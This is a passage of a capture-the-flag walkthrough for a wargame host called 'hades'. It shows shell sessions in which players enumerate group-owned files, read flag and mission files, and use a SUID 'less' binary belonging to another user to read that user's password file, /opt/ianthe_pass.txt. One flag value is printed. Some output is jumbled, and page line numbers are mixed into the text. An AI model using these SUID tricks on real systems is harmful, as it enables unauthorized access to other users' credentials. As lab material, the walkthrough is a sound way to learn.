uid=2026(hero) gid=2226(her0) groups=2226(her0),2026(hero)
hero@hades:~$ sudo -l
[sudo] password for hero:
Sorry, user hero may not run sudo on hades.
hero@hades:~$ find / -type f -group her0 2>/dev/null | grep -v proc
/usr/share/libs
hero@hades:~$ cat  /usr/share/libs
????????????????????

hestia

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
hestia@hades:~$ ls -al
total 228
drwxr-x--- 2 root   hestia   4096 Apr  5  2024 .
drwxr-xr-x 1 root   root     4096 Apr  5  2024 ..
-rw-r--r-- 1 hestia hestia    220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 hestia hestia   3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 hestia hestia    807 Apr 23  2023 .profile
-rw-r----- 1 root   hestia     22 Apr  5  2024 flagz.txt
-r-s--s--- 1 ianthe hestia 198960 Apr  5  2024 less
-rw-r----- 1 root   hestia    157 Apr  5  2024 mission.txt
hestia@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x36 #
################

## EN ##
User ianthe has left us her own less.

## ES ##
La usuaria ianthe nos ha dejado su propio less.

hestia@hades:~$ ./less mission.txt
/opt/ianthe_pass.txt
/var/tmp/.kileros/irene.txt
/var/tmp/begood.txt
/var/tmp/bash_26
/var/tmp/curlout.txt
/var/tmp/directory-list-2.3-medium.txt
/var/tmp/bash_26.save
/var/tmp/rock/rockyou.txt
/var/tmp/hola.sh
/pwned/hestia/less
!done  (press RETURN)
cat: /opt/ianthe_pass.txt: Permission denied
!done  (press RETURN)

????????????????????
/opt/ianthe_pass.txt (END)

irene

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
irene@hades:~$ ls -la
total 48
drwxr-x--- 2 root  irene  4096 Apr  5  2024 .
drwxr-xr-x 1 root  root   4096 Apr  5  2024 ..
-rw-r--r-- 1 irene irene   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 irene irene  3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 irene irene   807 Apr 23  2023 .profile
-rw-r----- 1 root  irene    22 Apr  5  2024 flagz.txt
---s--s--- 1 root  irene 16216 Apr  5  2024 hatechars
-rw-r----- 1 root  irene   145 Apr  5  2024 mission.txt
irene@hades:~$ cat flagz.txt mission.txt
^ZACnrFArVosWGJNfPkN^
################
# MISSION 0x38 #
################

## EN ##
User iris hates some characters.

## ES ##
La usuaria iris odia algunos caracteres.